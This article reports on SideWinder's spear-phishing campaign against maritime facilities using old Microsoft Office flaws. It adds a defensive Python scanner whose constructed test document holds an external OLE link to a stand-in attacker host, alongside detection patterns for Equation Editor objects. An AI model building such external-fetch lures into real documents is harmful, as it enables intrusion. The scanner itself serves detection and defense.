TLDR
- SideWinder, a nation-state threat actor believed to be affiliated with India, is conducting a new cyber espionage campaign.
- The campaign targets ports and maritime facilities in countries around the Indian Ocean and Mediterranean Sea.
- Attackers use spear-phishing emails with malicious Microsoft Word documents as the initial attack vector.
- The attack exploits old vulnerabilities in Microsoft Office (CVE-2017-0199 and CVE-2017-11882) to deliver malware.
- Targeted countries include Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
A new cyber espionage campaign targeting maritime facilities in multiple countries has been uncovered by security researchers. The campaign, attributed to a group known as SideWinder, is believed to be affiliated with India and has been active since 2012.
The BlackBerry Research and Intelligence Team discovered that SideWinder is targeting ports and maritime facilities in countries around the Indian Ocean and Mediterranean Sea. The affected countries include Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
SideWinder, also known by other names such as APT-C-17 and Razor Tiger, uses spear-phishing emails as its main attack method. These emails contain malicious Microsoft Word documents designed to trick recipients into opening them. The attackers use emotionally charged topics like sexual harassment, employee termination, and salary cuts to increase the chances of victims opening the attachments.
When a victim opens the malicious document, it exploits an old security flaw (CVE-2017-0199) in Microsoft Office. This vulnerability, which was patched in 2017, allows the document to connect to a malicious website controlled by the attackers. The website is disguised to look like it belongs to Pakistan’s Directorate General Ports and Shipping.
The attack then proceeds to download another malicious file that exploits another old vulnerability (CVE-2017-11882) in the Microsoft Office Equation Editor. This leads to the execution of malicious code on the victim’s computer.
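The two document features described above are visible in the file itself before Word ever opens it: a CVE-2017-0199 lure carries an OLE relationship whose target is an external URL, and a CVE-2017-11882 lure embeds an Equation Editor object (ProgID `Equation.3`). The following script is an added example written for this article, not code from BlackBerry or the original report; it unpacks a `.docx`, flags both indicators, and runs against two constructed sample documents (the `attacker.invalid` URL and every XML part are invented for the test). It goes slightly beyond the article by also flagging external `attachedTemplate` relationships, the remote-template variant of the same outbound-fetch trick.

```python
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_NS = "{urn:schemas-microsoft-com:office:office}"

# Relationship kinds that make Word fetch content from outside the file when the
# target is marked External. oleObject is the CVE-2017-0199 vector; attachedTemplate
# is the remote-template variant. Illustrative list, not exhaustive.
EXTERNAL_LOAD_RELS = ("oleObject", "attachedTemplate")

# ProgID registered by Equation Editor 3.0 (EQNEDT32.EXE), the component
# CVE-2017-11882 lives in. Any embedded object with this ProgID is worth a look.
EQUATION_PROGIDS = ("Equation.3",)


def scan_docx(data: bytes) -> list[str]:
    """Return a list of human-readable findings for one .docx given as bytes."""
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())

        # 1. External relationships in every .rels part of the package.
        for name in sorted(names):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode") == "External" and rtype in EXTERNAL_LOAD_RELS:
                    findings.append(f"{name}: external {rtype} -> {rel.get('Target')}")

        # 2. Equation Editor OLE objects declared in the main document part.
        if "word/document.xml" in names:
            root = ET.fromstring(zf.read("word/document.xml"))
            for obj in root.iter(OFFICE_NS + "OLEObject"):
                progid = obj.get("ProgID", "")
                if progid.startswith(EQUATION_PROGIDS):
                    findings.append(f"word/document.xml: OLE object ProgID={progid}")
    return findings


def build_docx(parts: dict[str, str]) -> bytes:
    """Assemble a minimal in-memory .docx from part name -> XML text (test helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
O_NS = "urn:schemas-microsoft-com:office:office"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Constructed sample: external OLE link plus an Equation Editor object.
SUSPICIOUS_DOC = build_docx({
    "word/document.xml": (
        f'<w:document xmlns:w="{W_NS}" xmlns:o="{O_NS}"><w:body>'
        '<o:OLEObject Type="Embed" ProgID="Equation.3"/>'
        "</w:body></w:document>"
    ),
    "word/_rels/document.xml.rels": (
        f'<Relationships xmlns="{PKG_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_REL}/oleObject" '
        'Target="http://attacker.invalid/lure.rtf" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{DOC_REL}/oleObject" '
        'Target="embeddings/oleObject1.bin"/>'
        "</Relationships>"
    ),
})

# Constructed sample: ordinary document with one embedded image, nothing external.
BENIGN_DOC = build_docx({
    "word/document.xml": f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>',
    "word/_rels/document.xml.rels": (
        f'<Relationships xmlns="{PKG_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_REL}/image" Target="media/image1.png"/>'
        "</Relationships>"
    ),
})


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_DOC), ("benign", BENIGN_DOC)):
        print(label, scan_docx(doc) or "no findings")
```

An embedded (non-external) `oleObject` relationship is normal and is deliberately not flagged; the point of the first check is the `TargetMode="External"` attribute combined with a relationship type that Word will resolve on open. A mail gateway or sandbox pre-filter can apply the same two checks to attachments, which is where the "advanced email filtering" recommendation later in the article becomes concrete.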
The attackers have taken steps to avoid detection. Their malware checks whether it is running on a real computer or in a virtual environment of the kind security researchers use for analysis. Only if it determines that the system is of interest does it proceed to download and run additional malicious code.
While the exact nature of the final payload isn’t known, researchers believe the goal is likely intelligence gathering. This fits with SideWinder’s previous campaigns, which have focused on espionage.
The use of old vulnerabilities in this campaign highlights the importance of keeping software up to date. Many organizations still use older versions of Microsoft Office, which makes them vulnerable to these kinds of attacks.
To protect against such threats, security experts recommend several measures:
- Keep all software, especially Microsoft Office, updated with the latest security patches.
- Train employees to recognize and report phishing attempts.
- Use advanced email filtering solutions to block malicious emails.
- Implement real-time threat detection and response systems.
The maritime industry, which plays a crucial role in global trade, appears to be a particular target in this campaign. This could be due to the strategic importance of shipping and port facilities to national economies and security.